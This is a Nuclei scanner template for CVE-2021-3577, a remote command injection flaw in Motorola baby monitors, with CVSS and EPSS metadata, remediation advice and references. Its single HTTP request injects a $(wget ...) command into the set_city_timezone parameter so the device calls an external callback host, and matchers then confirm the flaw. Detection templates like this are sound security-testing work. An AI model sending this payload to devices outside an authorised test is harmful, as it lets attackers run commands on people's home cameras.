id: CVE-2021-3577 info: name: Motorola Baby Monitors - Remote Command Execution author: gy741 severity: high description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. remediation: | Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. reference: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 - https://binatoneglobal.com/security-advisory/ classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 cwe-id: CWE-78,CWE-863 epss-score: 0.96855 epss-percentile: 0.99615 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: binatoneglobal product: halo\+_camera_firmware tags: cve,cve2021,rce,oast,motorola,iot http: - raw: - | GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word words: - "set_city_timezone" - type: status status: - 200 # digest: 490a0046304402204f2b529812baa4e4d6000d750909ab4b66fe84301b3753e40a7d1b515bbd1202022070ac454893f206b08004cd5929631be57d3b30c5478b8d11eb46e1bdea183833:922c64590222798bb761d5b6d8e72950